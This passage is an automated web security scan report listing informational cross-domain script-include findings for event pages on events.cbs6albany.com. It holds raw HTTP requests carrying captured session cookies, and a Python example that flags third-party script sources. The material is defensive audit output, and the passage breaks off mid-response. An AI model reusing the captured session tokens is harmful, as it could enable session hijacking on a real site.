Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 78
ETag: "05089b5f0e49c16cdb0adcbd3480883a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:35 GMT; HttpOnly
Content-Length: 41611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.194. http://events.cbs6albany.com/norfolk-ct/events/show/164346445-big-shot

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /norfolk-ct/events/show/164346445-big-shot

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Note that in the markup the onset.freedom.com src attribute is followed by the literal text " + z_page_type + "&usetitle=true": a JavaScript string concatenation that was emitted as HTML instead of being evaluated. The browser closes the src attribute at the first quote, so the request to onset.freedom.com ends at %7C and the z_page_type value never reaches it.

Request

GET /norfolk-ct/events/show/164346445-big-shot HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:44:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 100
ETag: "64e847f590f9dee44bacb04b3fdee023"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:44:48 GMT; HttpOnly
Content-Length: 44624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
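The check behind these "Cross-domain script include" findings is simple enough to reproduce offline against a saved response body. The following is an added example, not the scanner's own code: it collects every script src with the standard-library HTML parser, resolves it against the page URL the way a browser would, and reports the ones served from a host other than the page's. The sample HTML is constructed to mirror the response excerpt above (including the stray " + z_page_type + " after the onset.freedom.com src, which the parser, like a browser, treats as the end of the attribute) and is not the live page.

```python
"""Flag <script src> includes served from a host other than the page's own.

Added example (not the scanner's code): it reproduces the check behind the
"Cross-domain script include" findings in this report with only the standard
library, so it can be run offline against a saved response body.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)
                break


def script_sources(html, page_url):
    """Every script src as an absolute URL, resolved the way a browser would
    (relative and protocol-relative paths are joined against page_url)."""
    collector = _ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    return [urljoin(page_url, src) for src in collector.srcs]


def cross_domain_scripts(html, page_url):
    """Script URLs whose host differs from the page host (case-insensitive,
    port ignored). Same-host and inline scripts are not reported."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    return [
        url
        for url in script_sources(html, page_url)
        if (urlsplit(url).hostname or "").lower() not in ("", page_host)
    ]


def cross_domain_hosts(html, page_url):
    """Distinct third-party hosts in first-seen order: each one is a party
    whose JavaScript runs in the page's origin and can read its DOM."""
    hosts = []
    for url in cross_domain_scripts(html, page_url):
        host = urlsplit(url).hostname.lower()
        if host not in hosts:
            hosts.append(host)
    return hosts


# Constructed sample modelled on the response excerpt for
# /norfolk-ct/events/show/164346445-big-shot above; it is not the live page.
# The onset.freedom.com tag keeps the stray '" + z_page_type + "' seen in the
# report, to show that the parser (like a browser) ends the src at that quote.
SAMPLE_PAGE_URL = "http://events.cbs6albany.com/norfolk-ct/events/show/164346445-big-shot"
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<script src="/javascripts/site.js" type="text/javascript"></script>
<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
<script type="text/javascript" src="//edge.quantserve.com/quant.js"></script>
<script type="text/javascript">var inline_only = true;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for url in cross_domain_scripts(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(url)
    print("hosts:", ", ".join(cross_domain_hosts(SAMPLE_HTML, SAMPLE_PAGE_URL)))
```

Hostname comparison is deliberately strict: a script from common.onset.freedom.com is listed separately from onset.freedom.com, because each hostname is a separate deployment that could be compromised or repointed on its own. Treating sibling subdomains of the page's own domain as first-party is a policy decision that belongs in the triage step, not in the collector.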

18.195. http://events.cbs6albany.com/norfolk-ct/events/show/164346985-bo-bice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /norfolk-ct/events/show/164346985-bo-bice

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /norfolk-ct/events/show/164346985-bo-bice HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:20 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 103
ETag: "d030f8994c3681906f75ff28e49b5463"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:20 GMT; HttpOnly
Content-Length: 44603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.196. http://events.cbs6albany.com/norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /norfolk-ct/events/show/164347045-classic-albums-live-performs-led-zeppelins-houses-of-the-holy HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 89
ETag: "d1d0067eddd1a917947451911250dcb2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:24 GMT; HttpOnly
Content-Length: 45404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.197. http://events.cbs6albany.com/norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /norfolk-ct/venues/show/1102846-infinity-music-hall-and-bistro HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:45:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 133
ETag: "f458f777c334f44fa35e8505422e7ba7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:45:24 GMT; HttpOnly
Content-Length: 51615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.198. http://events.cbs6albany.com/pittsfield-ma/events/show/160788005-lover-youre-killin-me

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /pittsfield-ma/events/show/160788005-lover-youre-killin-me

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /pittsfield-ma/events/show/160788005-lover-youre-killin-me HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 126
ETag: "872d6f3ca83066d188d859d447c3dae3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:56 GMT; HttpOnly
Content-Length: 39618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
